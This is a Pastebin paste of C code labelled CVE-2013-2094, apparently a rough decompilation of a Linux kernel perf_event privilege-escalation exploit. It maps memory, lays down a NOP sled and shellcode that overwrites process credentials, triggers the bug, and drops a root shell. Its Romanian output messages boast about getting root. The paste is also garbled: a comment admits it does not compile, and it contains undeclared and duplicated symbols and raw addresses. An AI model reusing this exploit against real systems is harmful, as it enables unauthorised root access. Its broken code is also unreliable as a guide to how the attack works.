API tools faq
paste
Advertisement
kotarou777775

75caa89a5c3cd826d2698140e3e63583

kotarou777775
May 16th, 2017
173
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.32 KB | None | 0 0
raw download clone embed print report
  1. #include<stdio.h>
  2. //コンパイルはうまくいきません。
  3. //CVE-2013-2094
  4. int g_fd;
  5.  
  6. void sc() {
  7.     goto sc_next;
  8. sc_next:
  9. }
  10.  
  11. void morte() {
  12.     puts(0x401214);
  13.     close(g_fd);
  14.     dropshell();
  15. }
  16.  
  17. void dropshell() {
  18.     setuid(0);
  19.     errx(1, 0x4011dd);
  20.     puts(0x4011f1);
  21.     execl(0x40120c, 0x401209, NULL);
  22.     exit(0);
  23. }
  24.  
  25. int perf_open() {
  26.     int local_12[0x50];
  27.     memset(local_12, 0, 0x50);
  28.     return syscall(0x12a, *local_12, 0, -1, -1, 0);
  29. }
  30.  
  31. void sc_replace(char *a, char *b, int c) {
  32.     char *local_3 = a;
  33.     char *local_3_4 = b;
  34.     int local_4 = c;
  35.     local_1 = memmem(local_3, 0x384, local_3_4, 4);
  36.     if(local_1 == 0) {
  37.         errx(1, "can't find %x", local_3_4);
  38.     }
  39.     memcpy(local_1, local_4, 4);
  40. }
  41.  
  42. void trigger(int a) {
  43.     local_2_4 = a;
  44.     if(local_2_4 != 4 ) {
  45.         if(local_2_4 != 0x80) {
  46.             if(local_2_4 == 0) {
  47.                 local_1 = 1;
  48.                 local_0_4 = 1;
  49.                 local_1 -= 1;
  50.                 //local_0_4 >> 16;
  51.                 local_1 = local_0_4 / local_1;
  52.             }else {
  53.                 errx(1, "unknown intr %d", local_2_4);
  54.             }
  55.         }else {
  56.             //int 0x80
  57.         }
  58.     }else {
  59.         //int 4
  60.     }
  61.  
  62.     sleep(3);
  63. }
  64.  
  65. int map_mem() {
  66.     int ret = mmap(local_3, 0x10000000, 3, 0x32, 0xffffffff, 0);
  67.     if(ret == -1) {
  68.         err(1, "mmap()");
  69.     }
  70.     return ret;
  71. }
  72. void sc() {
  73.     int i;
  74.     int local_5 = *(&i & 0xffffffffffffe000);
  75.     int local_4 = local_5 >> 24;
  76.     int local_3 = 0xdeadbef0;
  77.     int local_2_4 = 0xdeadbef1;
  78.     i = 0;
  79.     for(;i < 0xf9f; i += 4) {
  80.         int *local_2 = &(*(local_5 + i));
  81.         int local_1 = *local_2;
  82.         if(*(local_2 + 2) == *local_2) {
  83.             if(*local_2 >> 24 == local_4) {
  84.                 for(int j = 0;j < 0x13; j++) {
  85.                     if(*(local_1 + (j << 2)) == local_2_4) {
  86.                         i = 0;
  87.                         if(i <= 6) {
  88.                             *(((i + j) << 2) + local_1) = 0;
  89.                             return 0;
  90.                         }
  91.                     }
  92.                 }
  93.             }
  94.         }
  95.     }
  96. }
  97.  
  98. int find_mem(int *a, int b) {
  99.     int *local_3 = a;
  100.     char local_3_4 = (char)b;
  101.     local_1 = local_3;
  102.     local_1_4 = 0;
  103.     while(local_1_4 > -1) {
  104.         if(*(local_1_4 + local_1) == local_3_4) {
  105.             return local_1_4;
  106.         }
  107.     }
  108.     return -1;
  109. }
  110.  
  111.  
  112.  
  113.  
  114. int main() {
  115.     puts("exploit local PRIVAT compilat de ps");
  116.     puts("caut vulnerabilitatea...");
  117.     int local_0_4 = 4;
  118.     int local_1 = 4;
  119.     void *local_4 = map_mem(0x380000000);
  120.     void *v2 = map_mem(0x1780000000);
  121.     memset(v2, 0x69, 0x10000000);
  122.     int local_4 = -1;
  123.     int v2 = 0;
  124.     int v3 = perf_open(local_4);
  125.     close(v3);
  126.     void *v4;
  127.     int v5 = find_mem(local_4, 0xff);
  128.     if(v5 == -1) {
  129.         errx(1, "neah ... nu poti lua root pe asta");
  130.     }
  131.     int local_1 = 0x18;
  132.     int v7 = 0x80000000;
  133.     int v8 = 0x17;
  134.     munmap(local_4, 0x10000000);
  135.     munmap(v2, 0x10000000);
  136.     v7 += v5;
  137.     v7 -= local_4 * local_1; //-1 * local_1
  138.     //sidt
  139.     local_4 = v7 - *(ebp - local_9_6);
  140.     local_4 -= v7 - *(ebp - local_9_6);
  141.     if(local_4 % local_1 != 8) {
  142.         if(local_4 % local_1 != 0x10) {
  143.             if(local_4 % local_1 == 0) {
  144.  
  145.             }else {
  146.                 errx(1, "remainder %d", local_1 % local_4);
  147.             }
  148.         }else{
  149.             local_0_4 = 4;
  150.         }
  151.     }else {
  152.         local_0_4 = 0x80;
  153.     }
  154.     local_4 -= local_0_4 << 4;
  155.     if(local_1 % local4 != 0) {
  156.         __assert_fail("(off % sz) == 0", 0x4012af, 0xf4, main)//?
  157.     }
  158.     local_13 = local_1
  159.     local_2 = -local_4 / local_13;
  160.     local_2 = local_9_6 & 0xff000000;
  161.     int ret = mmap(local_2, 0x2000000, 7, 0x32, 0xffffffff, 0);
  162.     if(ret == 0xff) {
  163.         err(0, 1, "mmap()");
  164.     }
  165.     memset(local_2, 0x90, 0x2000000);
  166.     local_2 += 0x1fffc00;
  167.     local_4_4 = sc_next - sc_start;
  168.     memcpy(local_2, sc_start, local_4_4);
  169.     local_2 += local_4_4;
  170.     memcpy(local_2, sym.sc, 0x384);
  171.     sc_replace(local_2, 0xdeadbef0, getuid());
  172.     sc_replace(local_2, 0xdeadbef1, getuid());
  173.     signal(0xe, morte);//signal for alarm
  174.     alarm(2);
  175.     g_fd = perf_open(local_4);
  176.     trigger(local_0_4);
  177.     exit(0);
  178.    
  179.     return 0;
  180. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!